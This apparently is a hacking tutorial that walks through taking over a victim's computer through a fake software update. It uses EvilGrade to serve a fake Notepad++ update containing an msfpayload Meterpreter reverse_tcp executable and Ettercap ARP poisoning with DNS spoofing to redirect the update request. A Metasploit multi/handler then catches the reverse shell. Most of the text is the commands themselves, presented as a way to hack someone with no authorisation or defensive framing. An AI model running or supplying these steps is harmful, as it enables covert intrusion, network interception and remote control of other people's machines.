Fake Updates – Back|Track 5 Hacking

Hi guy’s now I’m gonna show how to hack someone computer by redirecting the Update Request to your computer using EvilGrade

Now after download EvilGrade 2.0 lets extract it. To do that just run this command
tar xvfz isr-evilgrade-2.0.0.tar.gz

Note: Navigate to where you’ve downloaded the package using cd command

Then we need to run EvilGrade simple type these two commands
cd isr-evilgrade
./evilgrade

Now we need to determine the target application, because Evilgrade will create a fake update to inject the victim computer. To list all the supported application use
show modules
And it will print all the modules

List of modules:
===============

allmynotes
amsn
appleupdate
apptapp
apt
atube
autoit3
bbappworld
blackberry
bsplayer
ccleaner
clamwin
cpan
cygwin
dap
divxsuite
express_talk
fcleaner
filezilla
flashget
flip4mac
freerip
getjar
gom
googleanalytics
growl
isopen
istat
itunes
jet
jetphoto
linkedin
miranda
mirc
nokia
nokiasoftware
notepadplus
openoffice
opera
orbit
osx
paintnet
panda_antirootkit
photoscape
quicktime
skype
sparkle
speedbit
sunbelt
sunjava
superantispyware
teamviewer
techtracker
trillian
ubertwitter
vidbox
virtualbox
vmware
winamp
winscp
winupdate
winzip
yahoomsn
– 63 modules available.

In this tutorial I’ve used notepad plus show let’s configure the details to inject an update…
Let’s use this command configure [module_name] for example configure notepadplus to set the module
Now before we keep setting things up we need to get a value just type this command
show options
Something like this will be printed to the console

in the image above there’s VirtualHost that means when the victim update their notepad plus it will opening URL notepad-plus.sourceforge.net. later we will use this address.
Now let’s set up the agent I’m gonna use meterpreter/reverse_tcp instead of shell_reverse_tcp it allows you to do much more things
set agent '["/pentest/exploits/framework3/msfpayload windows/meterpreter/reverse_tcp LHOST=[your ip] LPORT=[1234] X > /tmp/notepadplus.exe"]'

Note: Don’t forget to remove the [] on LHOST and LPORT

And to finish the service in EvilGrade just type start

Do not close this window! Until the rest of the tutorial

In the image above it’s showing what to edit in etter.dns
etter.dns is located in /usr/share/ettercap/
This is how you should edit replace notepad-plus.sourceforge.net by the VirtualHost required by your module and replace 192.168.1.12 by your IP

Now start a new console and type ettercap -G
this will load ettercap in gui mode
Now go to “sniff” and click on “unbridged sniffing…”
Select your interface and click OK
Then go to “Plugins” and click on “Manage the Plugins…”
Double Click on dns_spoof
Now go to “Hosts” and click on “Scan for hosts” when the scan finishes go again to “Hosts” and click on “Hosts List”
Add your router IP to Target 1 and your Victim IP to Target 2
Then go to “Mitm” and click “Arp poisoning…”
Check “Sniff remote connections.” and click ok
Now to start the DNS Spoffing go to “Start” and click on “start sniffing”

Now open a new console and type this command
cd /pentest/exploits/framework3
./msfconsole
After the console loads type
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST [your ip]
set LPORT [your port]
exploit

Now just wait to the victim to update the application

Video